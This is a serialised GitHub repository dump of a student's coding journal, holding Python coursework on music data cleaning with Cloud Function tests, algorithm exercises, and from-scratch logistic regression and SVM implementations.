\none_d_dot(\"20180319_04_Qp1_Nyberg_beads.xlsx\")\n" } ]
3
Cedric-Liu/Coding-Journal
https://github.com/Cedric-Liu/Coding-Journal
eac200d3259904c797a3d97a4418960e3d1b8004
3e2eeb8fc0e907e0012d6e235ddb8f13773b6969
705c7be565b9eb7435fe487221f7b4fe4802543f
refs/heads/master
2020-04-25T08:14:09.361296
2019-03-04T02:52:11
2019-03-04T02:52:11
172,640,530
2
0
MIT
2019-02-26T04:55:35
2019-05-11T23:26:32
2019-07-17T19:37:57
Jupyter Notebook
[ { "alpha_fraction": 0.7046632170677185, "alphanum_fraction": 0.7046632170677185, "avg_line_length": 13.84615421295166, "blob_id": "a14e263ee2884dbe825ecfb0ca83ba8068c70111", "content_id": "19cc93b63ccbef43ad863bcbf9fce765876cf19b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "permissive", "max_line_length": 53, "num_lines": 13, "path": "/Text Analysis and GCP Deployment/conftest.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import os\n\nimport pytest\n\n\[email protected]\ndef rootdir():\n return os.path.dirname(os.path.abspath(__file__))\n\n\[email protected]\ndef datadir(rootdir):\n return os.path.join(rootdir, 'data')\n" }, { "alpha_fraction": 0.6267166137695312, "alphanum_fraction": 0.6292135119438171, "avg_line_length": 23.272727966308594, "blob_id": "acb4e4bc857e40164ad5226d69d59e9366724726", "content_id": "bd4403ff4342df787bdc737d35c69c51ebc3ebe5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 801, "license_type": "permissive", "max_line_length": 68, "num_lines": 33, "path": "/Text Analysis and GCP Deployment/music1030/fuzzy.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "from collections import Counter\nfrom typing import List\n\nimport pandas as pd\n\n\ndef jaccard_similarity(a: str,\n b: str) -> float:\n \"\"\"Takes in two strings and computes their letter-wise\n Jaccard similarity for bags.\n\n Case should be ignored.\n \"\"\"\n # TODO: Task 3\n # YOUR CODE HERE\n pass\n\n\ndef fuzzy_merge(left: pd.DataFrame,\n right: pd.DataFrame,\n on: List[str]) -> pd.DataFrame:\n \"\"\"Merge DataFrame objects by performing a fuzzy\n database-style join operation by columns.\n\n :param left: a DataFrame\n :param right: a DataFrame\n :param on: Column or index level names to join on. 
These must be\n found in both DataFrames.\n :return: the merged DataFrame\n \"\"\"\n # TODO: Task 3\n # YOUR CODE HERE\n pass\n" }, { "alpha_fraction": 0.4516128897666931, "alphanum_fraction": 0.7096773982048035, "avg_line_length": 15, "blob_id": "5bef12e6b45f675b7f527fadebd4b21b549e81a2", "content_id": "541225d43ae962b42b010879eddcd2a197011ed9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 31, "license_type": "permissive", "max_line_length": 16, "num_lines": 2, "path": "/Text Analysis and GCP Deployment/requirements.txt", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "requests==2.19.1\npandas==0.23.4" }, { "alpha_fraction": 0.6438356041908264, "alphanum_fraction": 0.6605783700942993, "avg_line_length": 25.280000686645508, "blob_id": "9b73ca68b68f150b423ffb23c0700caa6b351f10", "content_id": "20b82f28b0a49d101c4e4a040204a88e5df89a66", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 657, "license_type": "permissive", "max_line_length": 60, "num_lines": 25, "path": "/Text Analysis and GCP Deployment/main.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import flask\nimport pandas as pd\n\nfrom music1030.billboard import clean_billboard\nfrom music1030.spotify import clean_spotify_tracks\n\n\ndef handle_billboard(request: flask.Request):\n \"\"\"\n\n :param request: a flask Request containing the JSON data\n :return: a\n \"\"\"\n data = request.get_json()\n df = pd.DataFrame(data)\n cleaned_df: pd.DataFrame = clean_billboard(df)\n cleaned_json = cleaned_df.to_json(orient='records')\n return flask.Response(response=cleaned_json,\n status=200,\n mimetype='application/json')\n\n\ndef handle_spotify(request: flask.Request):\n # YOUR CODE HERE\n pass\n" }, { "alpha_fraction": 0.458781361579895, "alphanum_fraction": 0.4722222089767456, "avg_line_length": 30.91428565979004, "blob_id": 
"2a49bac4ea1f109f63b7c1e51cf21cfdae29d74f", "content_id": "c9620fd9c90ad2e87faadd12524cb3cdd6294ab6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1116, "license_type": "permissive", "max_line_length": 73, "num_lines": 35, "path": "/Data Structure and Algorithms/Group Anagrams.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "# def groupAnagrams(strs):\n# def is_anagram(a, b):\n# count = {}\n# for char in a:\n# count[char] = count.get(char, 0) + 1\n# for char in b:\n# if not char in count.keys():\n# return False\n# else:\n# count[char] -= 1\n# if count[char] < 0:\n# return False\n# return sum(count.values()) == 0\n#\n# hashdic = {}\n# used_index = []\n# for s1 in strs:\n# for s2 in strs:\n# if is_anagram(s1, s2) and strs.index(s2) not in used_index:\n# hashdic[s1] = hashdic.get(s1, [])\n# hashdic[s1].append(s2)\n# used_index.append(strs.index(s2))\n# res = [hashdic[key] for key in hashdic.keys()]\n# return res\n\ndef groupAnagrams(strs):\n hashdic = {}\n for s in strs:\n if ''.join(sorted(s)) in hashdic.keys():\n hashdic[''.join(sorted(s))].append(s)\n else:\n hashdic[''.join(sorted(s))] = [s]\n return list(hashdic.values())\n\nprint(groupAnagrams([\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]))" }, { "alpha_fraction": 0.2823967933654785, "alphanum_fraction": 0.3235378563404083, "avg_line_length": 25.727970123291016, "blob_id": "43113c9c6fde79755a59795b3b5b8dabc976ceff", "content_id": "6e99bf6b9c895e9441be486a3d5158ff76d114f3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6976, "license_type": "permissive", "max_line_length": 75, "num_lines": 261, "path": "/Text Analysis and GCP Deployment/main_test.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import json\n\nimport requests\n\n# TODO: You should put your cloud function URL here.\n# The URL below links to the TA 
version\nBILLBOARD_URL = 'https://us-central1-personal-198408.cloudfunctions.net' \\\n '/handle_billboard'\nSPOTIFY_URL = 'https://us-central1-personal-198408.cloudfunctions.net' \\\n '/handle_spotify'\n\n\ndef test_handle_billboard():\n response = requests.post(\n BILLBOARD_URL,\n headers={\n 'Content-type': 'application/json'\n },\n data=json.dumps([{\n \"artist_names\": \"Justin Bieber\",\n \"rank\": 1,\n \"song_name\": \"What Do You Mean?\",\n \"week\": \"2015-09-19\"\n }])\n )\n assert response.json() == [\n {\"rank\": 1,\n \"song_name\": \"What Do You Mean?\",\n \"week\": \"2015-09-19\",\n \"main_artist_name\": \"justin bieber\"\n }\n ]\n\n\ndef test_handle_spotify(datadir):\n data = [{\n \"album\": {\n \"album_type\": \"album\",\n \"artists\": [\n {\n \"external_urls\": {\n \"spotify\": \"https://open.spotify.com/artist/\"\n \"1E2AEtxaFaJtH0lO7kgNKw\"\n },\n \"href\": \"https://api.spotify.com/v1/artists/\"\n \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"id\": \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"name\": \"Russell Dickerson\",\n \"type\": \"artist\",\n \"uri\": \"spotify:artist:1E2AEtxaFaJtH0lO7kgNKw\"\n }\n ],\n \"available_markets\": [\n \"AD\",\n \"AR\",\n \"AT\",\n \"AU\",\n \"BE\",\n \"BG\",\n \"BO\",\n \"BR\",\n \"CA\",\n \"CH\",\n \"CL\",\n \"CO\",\n \"CR\",\n \"CY\",\n \"CZ\",\n \"DE\",\n \"DK\",\n \"DO\",\n \"EC\",\n \"EE\",\n \"ES\",\n \"FI\",\n \"FR\",\n \"GB\",\n \"GR\",\n \"GT\",\n \"HK\",\n \"HN\",\n \"HU\",\n \"ID\",\n \"IE\",\n \"IS\",\n \"IT\",\n \"JP\",\n \"LI\",\n \"LT\",\n \"LU\",\n \"LV\",\n \"MC\",\n \"MT\",\n \"MX\",\n \"MY\",\n \"NI\",\n \"NL\",\n \"NO\",\n \"NZ\",\n \"PA\",\n \"PE\",\n \"PH\",\n \"PL\",\n \"PT\",\n \"PY\",\n \"SE\",\n \"SG\",\n \"SK\",\n \"SV\",\n \"TH\",\n \"TR\",\n \"TW\",\n \"US\",\n \"UY\"\n ],\n \"external_urls\": {\n \"spotify\": \"https://open.spotify.com/album/\"\n \"1B6iXA14exgSuBrdHoNqrB\"\n },\n \"href\": \"https://api.spotify.com/v1/albums/\"\n \"1B6iXA14exgSuBrdHoNqrB\",\n \"id\": \"1B6iXA14exgSuBrdHoNqrB\",\n \"images\": 
[\n {\n \"height\": 640,\n \"url\": \"https://i.scdn.co/image/\"\n \"736107f18625aec57f16a6d84ef51820b139a39d\",\n \"width\": 640\n },\n {\n \"height\": 300,\n \"url\": \"https://i.scdn.co/image/\"\n \"3c0f3d5fef38df51cc160f342275171bfe888822\",\n \"width\": 300\n },\n {\n \"height\": 64,\n \"url\": \"https://i.scdn.co/image/\"\n \"d65a7cbb93752e9442c3cb41c80493925bd70eb9\",\n \"width\": 64\n }\n ],\n \"name\": \"Yours - EP\",\n \"type\": \"album\",\n \"uri\": \"spotify:album:1B6iXA14exgSuBrdHoNqrB\"\n },\n \"artists\": [\n {\n \"external_urls\": {\n \"spotify\": \"https://open.spotify.com/artist/\"\n \"1E2AEtxaFaJtH0lO7kgNKw\"\n },\n \"href\": \"https://api.spotify.com/v1/artists/\"\n \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"id\": \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"name\": \"Russell Dickerson\",\n \"type\": \"artist\",\n \"uri\": \"spotify:artist:1E2AEtxaFaJtH0lO7kgNKw\"\n }\n ],\n \"available_markets\": [\n \"AD\",\n \"AR\",\n \"AT\",\n \"AU\",\n \"BE\",\n \"BG\",\n \"BO\",\n \"BR\",\n \"CA\",\n \"CH\",\n \"CL\",\n \"CO\",\n \"CR\",\n \"CY\",\n \"CZ\",\n \"DE\",\n \"DK\",\n \"DO\",\n \"EC\",\n \"EE\",\n \"ES\",\n \"FI\",\n \"FR\",\n \"GB\",\n \"GR\",\n \"GT\",\n \"HK\",\n \"HN\",\n \"HU\",\n \"ID\",\n \"IE\",\n \"IS\",\n \"IT\",\n \"JP\",\n \"LI\",\n \"LT\",\n \"LU\",\n \"LV\",\n \"MC\",\n \"MT\",\n \"MX\",\n \"MY\",\n \"NI\",\n \"NL\",\n \"NO\",\n \"NZ\",\n \"PA\",\n \"PE\",\n \"PH\",\n \"PL\",\n \"PT\",\n \"PY\",\n \"SE\",\n \"SG\",\n \"SK\",\n \"SV\",\n \"TH\",\n \"TR\",\n \"TW\",\n \"US\",\n \"UY\"\n ],\n \"disc_number\": 1,\n \"duration_ms\": 211240,\n \"explicit\": False,\n \"external_ids\": {\n \"isrc\": \"USQX91602319\"\n },\n \"external_urls\": {\n \"spotify\": \"https://open.spotify.com/track/\"\n \"6Axy0fL3FBtwx2rwl4soq9\"\n },\n \"href\": \"https://api.spotify.com/v1/tracks/6Axy0fL3FBtwx2rwl4soq9\",\n \"id\": \"6Axy0fL3FBtwx2rwl4soq9\",\n \"name\": \"Blue Tacoma\",\n \"popularity\": 78,\n \"preview_url\": \"https://p.scdn.co/mp3-preview/\"\n 
\"4fd8dd4532f5c256745783bba52750e59af1238f?\"\n \"cid=fd8abe6759d345499f8677c6c0adad96\",\n \"track_number\": 4,\n \"type\": \"track\",\n \"uri\": \"spotify:track:6Axy0fL3FBtwx2rwl4soq9\"\n }]\n\n response = requests.post(\n SPOTIFY_URL,\n headers={\n 'Content-type': 'application/json'\n },\n data=json.dumps(data)\n )\n\n assert response.json() == [{\n \"main_artist_id\": \"1E2AEtxaFaJtH0lO7kgNKw\",\n \"main_artist_name\": \"russell dickerson\",\n \"popularity\": 78,\n \"song_id\": \"6Axy0fL3FBtwx2rwl4soq9\",\n \"song_length\": 211240,\n \"song_name\": \"blue tacoma\"\n }]\n" }, { "alpha_fraction": 0.8238636255264282, "alphanum_fraction": 0.8238636255264282, "avg_line_length": 58, "blob_id": "f88bbb7dab5f46bbf26cb8ce5751877959bb0a7e", "content_id": "0d9377beef987f3f9009455b70246d53d49ccb9d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 176, "license_type": "permissive", "max_line_length": 110, "num_lines": 3, "path": "/README.md", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "# Coding-Journal\nPersonal Coding records: Machine Learning, Deep Learning, Statistical Learning, Data Structures and Algorithms\n# Resumes are overrated, Code speaks for itself." }, { "alpha_fraction": 0.55859375, "alphanum_fraction": 0.5729166865348816, "avg_line_length": 28.576923370361328, "blob_id": "f2672cd5b3f8b8e200ce1028a2f09770b3c74862", "content_id": "486fe331fc266813c397981ff572582e0aed3d08", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 768, "license_type": "permissive", "max_line_length": 78, "num_lines": 26, "path": "/Data Structure and Algorithms/Longest Palindromic Substring.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "#Given a string s, find the longest palindromic substring in s. 
You may assume\n# that the maximum length of s is 1000.\ndef longestPalindrome(s: str) -> str:\n left, right = 0, len(s) - 1\n\n def is_palindrome(sub):\n left, right = 0, len(sub) - 1\n while left <= right:\n if sub[left] != sub[right]:\n return False\n else:\n left += 1\n right -= 1\n return True\n\n if is_palindrome(s):\n return s\n else:\n left_advance = longestPalindrome(s[left + 1:])\n right_advance = longestPalindrome(s[:right])\n if len(left_advance) >= len(right_advance):\n return left_advance\n else:\n return right_advance\n\nprint(longestPalindrome(\"babaddtattarraaaaa\"))" }, { "alpha_fraction": 0.5855513215065002, "alphanum_fraction": 0.5988593101501465, "avg_line_length": 31.875, "blob_id": "2128fd7f1662716a8fd5195e961be606a783a8f1", "content_id": "8d1be3352ed8f4516baad7368f0f88b77a35bfae", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1586, "license_type": "permissive", "max_line_length": 74, "num_lines": 48, "path": "/Text Analysis and GCP Deployment/music1030/fuzzy_test.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import os\n\nimport pandas as pd\nimport pytest\n\nfrom .fuzzy import jaccard_similarity, fuzzy_merge\n\n\ndef test_jaccard():\n assert jaccard_similarity('a', 'b') == 0\n assert jaccard_similarity('c', 'c') == 1\n assert jaccard_similarity('C', 'c') == 1\n assert jaccard_similarity('ace', 'acd') == 2 / 4\n\n\ndef test_fuzzy_merge():\n df1 = pd.DataFrame(['sipping on fire'], columns=['song'])\n df2 = pd.DataFrame(['sippin’ on fire'], columns=['song'])\n\n actual = fuzzy_merge(df1, df2, on=['song'])\n\n expected = pd.DataFrame([('sipping on fire', 'sippin’ on fire')],\n columns=['song_x', 'song_y'])\n\n assert expected.equals(actual)\n\n\ndef test_fuzzy_merge_string_index():\n df1 = pd.DataFrame(['sipping on fire'], columns=['song'], index=['a'])\n df2 = pd.DataFrame(['sippin’ on fire'], columns=['song'], index=['b'])\n\n actual = 
fuzzy_merge(df1, df2, on=['song'])\n\n expected = pd.DataFrame([('sipping on fire', 'sippin’ on fire')],\n columns=['song_x', 'song_y'])\n\n assert expected.equals(actual)\n\n\ndef test_fuzzy_merge_spotify_lastfm_first100(datadir):\n spotify_df = pd.read_csv(os.path.join(datadir, 'spotify.csv'))\n spotify_df = spotify_df[1300:]\n lastfm_df = pd.read_csv(os.path.join(datadir, 'lastfm.csv'))\n actual = fuzzy_merge(spotify_df, lastfm_df,\n on=['song_name', 'main_artist_name'])\n mask = ((actual['song_name_x'] == 'trees get wheeled away') &\n (actual['song_name_y'] == 'the trees get wheeled away'))\n assert len(actual[mask]) == 1\n" }, { "alpha_fraction": 0.5997958183288574, "alphanum_fraction": 0.6222562789916992, "avg_line_length": 30.095237731933594, "blob_id": "3f1352f7aacf8a7e0494c4d8aebb7f4cdf035e2f", "content_id": "2a8c4535228035f9d515de32e1649d21f9c02c8f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1959, "license_type": "permissive", "max_line_length": 77, "num_lines": 63, "path": "/Text Analysis and GCP Deployment/music1030/billboard_test.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import os\n\nimport pandas as pd\n\nfrom .billboard import clean_artist_col, clean_billboard\n\n\ndef test_prune_dummy():\n dummy1 = pd.Series(data=['Major Lazer & DJ Snake Featuring MO'])\n pruned1 = clean_artist_col(dummy1)\n assert pruned1[0] == 'major lazer'\n dummy2 = pd.Series(data=['Selena Gomez Featuring A$AP Rocky',\n # The following two lines represent a single row\n ('Macklemore & Ryan Lewis Featuring Eric Nally,' +\n 'Melle Mel, Kool Moe Dee & Grandmaster Caz'),\n 'Young Thug And Travis Scott Featuring Quavo'])\n pruned2 = clean_artist_col(dummy2)\n assert pruned2[0] == 'selena gomez'\n assert pruned2[1] == 'macklemore'\n assert pruned2[2] == 'young thug'\n\n\ndef test_prune_full(datadir):\n hot100_path = os.path.join(datadir, 'hot100.csv')\n df = 
pd.read_csv(hot100_path)\n df_copy = df.copy()\n\n pruned_col = clean_artist_col(df['artist_names'])\n\n assert not pruned_col.str.contains(' and ').any()\n assert not pruned_col.str.contains('&').any()\n assert not pruned_col.str.contains(' featuring').any()\n assert df.equals(df_copy)\n\n\ndef test_clean_partial(datadir):\n hot100_path = os.path.join(datadir, 'hot100.csv')\n df = pd.read_csv(hot100_path)\n df_copy = df.copy()\n\n cleaned = clean_billboard(df.iloc[0:10])\n\n assert 'song_name' in cleaned.columns\n assert 'rank' in cleaned.columns\n assert 'week' in cleaned.columns\n assert not df.isnull().values.any()\n assert not df.duplicated().any()\n assert df.equals(df_copy)\n\n\ndef test_clean_full(datadir):\n hot100_path = os.path.join(datadir, 'hot100.csv')\n df = pd.read_csv(hot100_path)\n df_copy = df.copy()\n\n cleaned = clean_billboard(df)\n\n assert 'song_name' in cleaned.columns\n assert 'rank' in cleaned.columns\n assert 'week' in cleaned.columns\n assert not df.isnull().values.any()\n assert not df.duplicated().any()\n assert df.equals(df_copy)\n" }, { "alpha_fraction": 0.7537537813186646, "alphanum_fraction": 0.7717717885971069, "avg_line_length": 46.57143020629883, "blob_id": "6bf2f3c1a02142b5a8759101ebf0e262be5513b8", "content_id": "ff1698271044ccc260bf3e29891b34dd34f96153", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 333, "license_type": "permissive", "max_line_length": 84, "num_lines": 7, "path": "/Web Interactive Data Viz-Python/README.md", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "#HW 4 Plotly\nI have successfully finished all tasks, for task 4 Dash part, there are some\nthings I need to address.\nBecause the limitation of 100MB file size in GitHub, I can't push 'images' folder\nto the GitHub.\nIf you need to run the task 4 successfully, you should put the 'images' folder under\nthe directory'data/cars/images'!!!\n" }, { "alpha_fraction": 
0.5670538544654846, "alphanum_fraction": 0.5804294347763062, "avg_line_length": 34.582279205322266, "blob_id": "80f8a2e35aa0f0b76099cc97bb5597c7c5268a59", "content_id": "9ac07ac7358b1ad7e7ad0afae9328081f723ed2e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2841, "license_type": "permissive", "max_line_length": 79, "num_lines": 79, "path": "/Model Building From Scratch/logistic_regression.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\n\n\ndef preprocess():\n \"\"\"Return the preprocessed data set\"\"\"\n data = pd.read_csv('weatherAUS.csv')\n\n # Drop certain features any any data with null values\n data = data.drop(['Sunshine', 'Evaporation', 'Cloud3pm',\n 'Cloud9am', 'Location', 'RISK_MM', 'Date'], axis=1)\n data = data.dropna(how='any')\n\n # Change labels\n data['RainToday'].replace({'No': 0, 'Yes': 1}, inplace=True)\n data['RainTomorrow'].replace({'No': 0, 'Yes': 1}, inplace=True)\n\n # Change categorical data to integers\n categorical_columns = ['WindGustDir', 'WindDir3pm', 'WindDir9am']\n data = pd.get_dummies(data, columns=categorical_columns)\n\n # standardize data set\n scaler = preprocessing.MinMaxScaler()\n scaler.fit(data)\n data = pd.DataFrame(scaler.transform(data),\n index=data.index, columns=data.columns)\n\n y = data.pop('RainTomorrow')\n X_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.2)\n return X_train, X_test, y_train, y_test\n\n\nclass LogisticRegression(object):\n def __init__(self):\n self.X_train, X_test, self.y_train, y_test = preprocess()\n\n # activation function\n def sigmoid(self, x):\n \"\"\"Return the output of sigmoid fuction\"\"\"\n return 1 / (1 + np.exp(-x))\n\n # fit part\n def fit(self, X, y, learning_rate=0.01, epochs=32,\n batch_size=1, num_iter=100000):\n \"\"\"Train the 
model using SGD\"\"\"\n # add intercept\n intercept = np.ones((X.shape[0], 1))\n X = np.concatenate((intercept, X), axis=1)\n y = np.array(y)\n # initialize weights\n self.beta = np.zeros(X.shape[1])\n # Utilizing SGD to do weight tuning\n for i in range(epochs):\n for j in range(num_iter):\n index = np.random.randint(0, len(X) - 1)\n z = np.dot(X[index], self.beta)\n r = self.sigmoid(z)\n gradient = (r - y[index]) * X[index]\n self.beta -= learning_rate * gradient\n\n # Prediction part\n def predict(self, X):\n \"\"\"Return the prediction list\"\"\"\n # add intercept\n intercept = np.ones((X.shape[0], 1))\n X = np.concatenate((intercept, X), axis=1)\n predict_value = self.sigmoid(np.dot(X, self.beta))\n predict_value = np.array(list(map(lambda x: 1 if x > 0.5 else 0,\n predict_value)))\n return predict_value\n\n # Evaluate part\n def evaluate(self, X_test, y_test):\n \"\"\"Returns a numpy array of prediction labels\"\"\"\n self.fit(self.X_train, self.y_train)\n predict_value = self.predict(X_test)\n return predict_value\n \n \n \n \n \n \n" }, { "alpha_fraction": 0.6740331649780273, "alphanum_fraction": 0.6795580387115479, "avg_line_length": 15.545454978942871, "blob_id": "8e7375cd09e9af2ead625120eccfa4b13cf61cba", "content_id": "3e0ed0ac94202184ac996811c99e6bd16d32af86", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "permissive", "max_line_length": 61, "num_lines": 11, "path": "/Text Analysis and GCP Deployment/music1030/spotify.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "from typing import List, Dict\n\nimport pandas as pd\n\n\n# YOUR CODE HERE\n\ndef clean_spotify_tracks(tracks: List[Dict]) -> pd.DataFrame:\n # TODO: Task 5\n # YOUR CODE HERE\n pass" }, { "alpha_fraction": 0.5721077919006348, "alphanum_fraction": 0.5752773284912109, "avg_line_length": 27.68181800842285, "blob_id": "7efa0ef40dfe618065410ee18e5c44e381a282a2", "content_id": 
"fd6419b82306c48e01317dbc979bb92a31ab5957", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 631, "license_type": "permissive", "max_line_length": 70, "num_lines": 22, "path": "/Text Analysis and GCP Deployment/music1030/billboard.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import re\n\nimport pandas as pd\n\n\ndef clean_artist_col(artist_names: pd.Series) -> pd.Series:\n # TODO: Task 9\n # YOUR CODE HERE\n pass\n\ndef clean_billboard(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Returns a cleaned billboard DataFrame.\n\n :param df: the billboard DataFrame\n :return a new cleaned DataFrame\n \"\"\"\n pruned_col = clean_artist_col(df['artist_names'])\n cleaned_df: pd.DataFrame = (df.assign(main_artist_name=pruned_col)\n .drop_duplicates()\n .dropna()\n .drop('artist_names', axis=1))\n return cleaned_df\n" }, { "alpha_fraction": 0.5189003348350525, "alphanum_fraction": 0.5223367810249329, "avg_line_length": 21.230770111083984, "blob_id": "316772ac0c3768a28d75be0ffcf18f478f2a408d", "content_id": "a6094cebee415db9cea3924df368724366b6c769", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "permissive", "max_line_length": 58, "num_lines": 13, "path": "/Data Structure and Algorithms/Tree and Traverse Methods.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "class Node(object):\n \"\"\"Node\"\"\"\n def __init__(self, elem=-1, lchild=None, rchild=None):\n self.elem = elem\n self.lchild = lchild\n self.rchild = rchild\n\n\nclass Tree(object):\n \"\"\"Tree\"\"\"\n def _init_(self):\n self.root = Node()\n sefl.myQueue = []\n\n\n" }, { "alpha_fraction": 0.5578485131263733, "alphanum_fraction": 0.5661910176277161, "avg_line_length": 32.74074172973633, "blob_id": "6cb481de1bade29c881232e3dfe5dc0091fdc87b", "content_id": "e068b5ffb2389fe50c45a4d88dcd6a606698cf77", 
"detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4572, "license_type": "permissive", "max_line_length": 79, "num_lines": 135, "path": "/Model Building From Scratch/svm.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport scipy\nimport cvxpy as cp\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\n\ndef preprocess():\n data = pd.read_csv('weatherAUS.csv')\n\n # Drop certain features any any data with null values\n data = data.drop(['Sunshine', 'Evaporation', 'Cloud3pm', 'Cloud9am', \n 'Location', 'RISK_MM','Date'], axis=1)\n data = data.dropna(how='any')\n\n # Change labels\n data['RainToday'].replace({'No': 0, 'Yes': 1}, inplace = True)\n data['RainTomorrow'].replace({'No': -1, 'Yes': 1}, inplace = True)\n\n # Change categorical data to integers\n categorical_columns = ['WindGustDir', 'WindDir3pm', 'WindDir9am']\n data = pd.get_dummies(data, columns=categorical_columns)\n\n # standardize data set\n scaler = preprocessing.MinMaxScaler()\n scaler.fit(data)\n data = pd.DataFrame(scaler.transform(data), \n index=data.index, columns=data.columns)\n y = data.pop('RainTomorrow')\n\n X_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.2)\n return X_train, X_test, y_train, y_test\n\n\nclass LinearSVM(object):\n \"\"\"A support vector machine with linear kernel that trains using\n the primal convex minimization problem\"\"\"\n\n def __init__(self, C=1.0):\n self.C = C\n self.w = None\n self.b = None\n\n def train(self, X, y):\n \"\"\"Use training arrays to set the values of self.w and self.b\"\"\"\n if isinstance(X, pd.DataFrame):\n X = X.values\n if isinstance(y, pd.DataFrame): \n y = y.values\n y = np.array([-1 if x == 0 else 1 for x in y])\n nrows, ncols = np.shape(X)\n ζ = cp.Variable(nrows)\n # insert the correct length for w\n w = 
cp.Variable(ncols)\n b = cp.Variable()\n # use cp.sum_squares and cp.sum to form the objective function\n objective = cp.Minimize(0.5 * cp.sum_squares(w) + self.C * cp.sum(ζ))\n # apply the optimization constraints (hint: cp.multiply)\n constraints = [cp.multiply(y, X * w + b) >= 1 - ζ,\n ζ >= 0]\n prob = cp.Problem(objective, constraints)\n prob.solve()\n self.w = w.value\n self.b = b.value\n\n def predict(self, X_test):\n \"\"\"Return a numpy array of prediction labels\"\"\"\n if isinstance(X_test, pd.DataFrame):\n X_test = X_test.values\n predict = np.dot(X_test, self.w) + self.b\n predict = [1 if x >= 0 else 0 for x in predict]\n return np.array(predict)\n\n\ndef linear_kernel(a, b):\n \"\"\"Return the data converted by linear kernel\"\"\"\n return np.dot(a, b.T)\n\n\ndef polynomial_kernel(a, b):\n \"\"\"Return the data converted by polynomial kernel\"\"\"\n return (np.dot(a, b.T) + 1) ** 2\n\n\ndef rbf_kernel(a, b):\n \"\"\"Return the data converted by RBF kernel\"\"\"\n return np.exp(-(np.dot(a, a.T) + np.dot(b, b.T) - 2 * np.dot(a, b.T)))\n\n\nclass SVM(object):\n def __init__(self, kernel=rbf_kernel, C=1.0):\n self.kernel = kernel\n self.C = C\n self.X = None\n self.y = None\n self.α = None\n self.b = None\n\n def train(self, X, y):\n \"\"\"Use training arrays X and y to set the values of \n self.α and self.b\"\"\"\n if isinstance(X, pd.DataFrame):\n X = X.values\n if isinstance(y, pd.DataFrame):\n y = y.values\n y = np.array([-1 if x == 0 else 1 for x in y])\n nrows, ncols = np.shape(X)\n α = cp.Variable(nrows)\n w = cp.Variable(ncols)\n # form a kernel matrix (as a numpy array)\n K = self.kernel(X, X)\n objective = cp.Minimize(1/2 * cp.quad_form(cp.multiply(α, y), K)\n - cp.sum(α))\n # list the constraints for the optimization problem\n constraints = [α >= 0,\n α <= self.C,\n α * y == 0]\n prob = cp.Problem(objective, constraints)\n prob.solve()\n self.X = X\n self.y = y\n # fill in the value of α\n self.α = α.value\n # fill in the value of b\n self.b = 
